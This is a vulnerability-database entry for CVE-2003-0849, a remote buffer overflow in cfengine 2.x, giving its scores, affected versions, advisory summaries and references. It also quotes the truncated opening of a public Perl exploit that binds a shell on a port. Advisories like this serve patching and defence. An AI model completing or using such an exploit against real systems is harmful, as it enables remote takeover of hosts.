Published: 17/11/2003 Updated: 18/10/2016

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 765

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Buffer overflow in net.c for cfengine 2.x prior to 2.0.8 allows remote malicious users to execute arbitrary code via certain packets with modified length values, which is trusted by the ReceiveTransaction function when using a buffer provided by the BusyWithConnection function.

Vulnerable Product	Search on Vulmon	Subscribe to Product
gnu cfengine 2.0.0
gnu cfengine 2.0.5
gnu cfengine 2.1.0
gnu cfengine 2.0.1
gnu cfengine 2.0.2
gnu cfengine 2.0.6
gnu cfengine 2.0.7
gnu cfengine 2.0.3
gnu cfengine 2.0.4

source: wwwsecurityfocuscom/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user The vulnerab ...

source: wwwsecurityfocuscom/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user The vulnerabil ...

#!/usr/bin/perl -s # kokaninATdtorsnet / cfengine2-203 from freebsd ports 26/sep/2003 # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discovered by nick cleaton, tested on FreeBSD 48-RELEASE use IO::Socket; if(!$ARGV[1]) { print "usage: /DSR-cfenginepl <host> <port> (default cfengine is 5308)\n"; exit(-1); } $hos ...

NVD-CWE-Other http://marc.info/?l=bugtraq&m=106546086216984&w=2 http://marc.info/?l=bugtraq&m=106451047819552&w=2 http://marc.info/?l=bugtraq&m=106485375218280&w=2 https://nvd.nist.gov https://www.exploit-db.com/exploits/23183/

CVE-2003-0849

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect